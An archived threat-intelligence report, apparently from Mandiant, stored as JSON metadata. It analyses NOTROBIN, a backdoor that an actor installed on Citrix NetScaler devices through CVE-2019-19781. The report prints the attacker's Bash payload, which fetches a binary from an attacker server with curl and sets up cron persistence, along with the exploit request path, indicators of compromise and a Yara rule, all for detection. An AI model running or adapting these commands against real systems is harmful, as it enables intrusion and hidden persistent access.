{
	"id": "e33769be-c310-4a0e-a32a-8e88be211fd5",
	"created_at": "2026-04-06T00:20:51.97116Z",
	"updated_at": "2026-04-10T13:12:00.258014Z",
	"deleted_at": null,
	"sha1_hash": "8fe71842f2b009b3ea922d8cf27cfcda409aaaf1",
	"title": "Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 372661,
	"plain_text": "Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability\r\nWhile Maintaining Backdoor | Mandiant\r\nBy Mandiant\r\nPublished: 2020-01-15 · Archived: 2026-04-02 12:08:55 UTC\r\nWritten by: William Ballenthin, Josh Madeley\r\nAs noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard\r\nat work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of\r\nsuccessful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented,\r\nwe’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one\r\nparticular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family\r\nNOTROBIN.\r\nUpon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys\r\nNOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains\r\nbackdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting\r\naccess to NetScaler devices for a subsequent campaign.\r\nInitial Compromise\r\nThis actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised\r\ndevice. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable\r\nnewbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:\r\n127.0.0.2 - - \"POST\r\n/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 304 - \"-\" \"curl/7.67.0\"\r\nFigure 1: Web log showing exploitation\r\nUnlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an\r\nHTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t\r\nrecovered the POST body contents to see how it works. In any case, exploitation causes the Bash one liner shown\r\nin Figure 2 to run on the compromised system:\r\npkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k\r\nhxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o\r\n/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *\r\n/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd \u0026\"\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 1 of 7\n\nFigure 2: Bash exploit payload\r\nThis is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of\r\ncommands includes:\r\n1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency\r\nmining utilities deployed to NetScaler devices.\r\n2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute\r\npermission.\r\n3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which\r\nNOTROBIN will copy itself.\r\n4. Manually execute NOTROBIN.\r\nThere’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing\r\nnearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook\r\nan obvious compromise of their NetScaler devices.\r\nThe actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to\r\nbe an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after\r\ntheir embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple\r\nclients. Compartmenting payloads indicates the actor is exercising operational security.\r\nFireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation\r\nof NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of\r\ncompromise to triage NetScaler devices.\r\nJan 12 21:57:00 \u003ccron.info\u003e foo.netscaler /usr/sbin/cron[73531]:\r\n(nobody) CMD (/var/nstmp/.nscache/httpd)\r\nFigure 3: cron log entry showing NOTROBIN execution\r\nNow, let’s turn our attention to what NOTROBIN does.\r\nAnalysis of NOTROBIN\r\nNOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically\r\nscans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to\r\nblock exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that\r\nNOTROBIN provides backdoor access to the compromised system.\r\nWhen executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility\r\ncopies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating\r\nthe process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 2 of 7\n\nNow the fun begins: it spawns two routines that periodically check for and delete exploits.\r\nEvery second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14\r\ndays and deletes them, unless the filename or file content contains a hardcoded key (example:\r\n64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this\r\ndirectory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly\r\nknown payloads, such as PersonalBookmark.pl.\r\nEight times per second, NOTROBIN searches for files with an .xml extension in the directory\r\n/netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates\r\ncontaining attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK,\r\nwhich likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility\r\ndoes not delete files with a filename containing the secret key.\r\nFireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while\r\nmaintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit\r\ncode found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded\r\nkey during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to\r\nthe vulnerable device at a later time.\r\nAcross multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example,\r\nwe’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been\r\nunsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as\r\ncompeting attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor\r\nfollows a strong password policy!\r\nBased on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source\r\ncode files named after the key. Figure 4 and Figure 5 show examples of these filenames.\r\n/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go\r\nFigure 4: Source filename recovered from NOTROBIN sample\r\n/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go\r\nFigure 5: Source filename recovered from NOTROBIN sample\r\nWe wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys\r\nand build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original\r\nsource!\r\nOutstanding Questions\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 3 of 7\n\nNOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the\r\ndata without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this\r\nbehavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active\r\non this port.\r\nFigure 6: NOTROBIN logic that drops UDP traffic\r\nThere is also an empty function main.install_cron whose implementation has been removed, so alternatively,\r\nperhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP\r\nport 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a\r\ncompromised NetScaler device, including a port listening on UDP 18634.\r\nFigure 7: File handling listing of compromised NetScaler device\r\nNOTROBIN Efficacy\r\nDuring one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single\r\ndevice, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was\r\ninstalled, we identified successful attacks from multiple actors. But, across the following three days, more than a\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 4 of 7\n\ndozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the\r\nvulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed\r\nexploitation attempt.\r\n127.0.0.2 - - \"GET\r\n/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1\" 404 48 \"-\"\r\n\"curl/7.47.0\"\r\nFigure 8: Web log entry showing a failed exploitation attempt\r\nNote that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their\r\npayload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly\r\nafter it was created – and before it could be used by the other actor.\r\nFireEye has not yet identified if the actor has returned to NOTROBIN backdoors.\r\nConclusion\r\nFireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices,\r\npossibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection\r\nby administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN\r\nmitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While\r\nwe haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the\r\ninternet from the shadows.\r\nIndicators of Compromise and Discovery\r\nTable 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat\r\nis the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time\r\nof observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of\r\n80.240.31[.]218.\r\nIOC Item Value\r\nHTTP URL prefix hxxps://95[.]179.163.186/wp-content/uploads/2018/09/\r\nDirectory /var/nstmp/.nscache\r\nFilename /var/nstmp/.nscache/httpd\r\nDirectory /tmp/.init\r\nFilename /tmp/.init/httpd\r\nCrontab entry /var/nstmp/.nscache/httpd\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 5 of 7\n\nListening UDP port 18634\r\nRemote IP 95.179.163[.]186\r\nRemote IP 80.240.31[.]218\r\nDomain vilarunners[.]cat\r\nTable 1: Indicators of Compromise\r\nDiscovery on VirusTotal\r\nYou can use the following VTI queries to identify NOTROBIN variants on VirusTotal:\r\nvhash:\"73cee1e8e1c3265c8f836516c53ae042\"\r\nvhash:\"e57a7713cdf89a2f72c6526549d22987\"\r\nNote, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the\r\nvHashes cover the same variants identified by the Yara rule listed in Figure 9.\r\nrule NOTROBIN\r\n{\r\n meta:\r\n author = \"william.ballenthin@fireeye.com\"\r\n date_created = \"2020-01-15\"\r\n strings:\r\n $func_name_1 = \"main.remove_bds\"\r\n $func_name_2 = \"main.xrun\"\r\n condition:\r\n all of them\r\n}\r\nFigure 9: Yara rule that matches on NOTROBIN variants\r\nRecovered Authentication Keys\r\nFireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter\r\ncompromised environments. We expect that these strings may be found within subsequent exploitation attempts,\r\neither as filenames or payload content. Although we won’t publish them here out of concern for our customers,\r\nplease reach out if you’re looking for NOTROBIN within your environment and we can provide a list.\r\nAcknowledgements\r\nThank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer\r\nfor collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 6 of 7\n\nintel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN\r\nsamples, and Ashley Frazer for refining the presentation and conclusions.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaini\r\nng-backdoor.html\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html"
	],
	"report_names": [
		"vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e16a6567-2b9a-4419-960b-1e03fccc8812",
			"created_at": "2023-01-06T13:46:39.128684Z",
			"updated_at": "2026-04-10T02:00:03.224215Z",
			"deleted_at": null,
			"main_name": "NOTROBIN",
			"aliases": [],
			"source_name": "MISPGALAXY:NOTROBIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434851,
	"ts_updated_at": 1775826720,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8fe71842f2b009b3ea922d8cf27cfcda409aaaf1.pdf",
		"text": "https://archive.orkl.eu/8fe71842f2b009b3ea922d8cf27cfcda409aaaf1.txt",
		"img": "https://archive.orkl.eu/8fe71842f2b009b3ea922d8cf27cfcda409aaaf1.jpg"
	}
}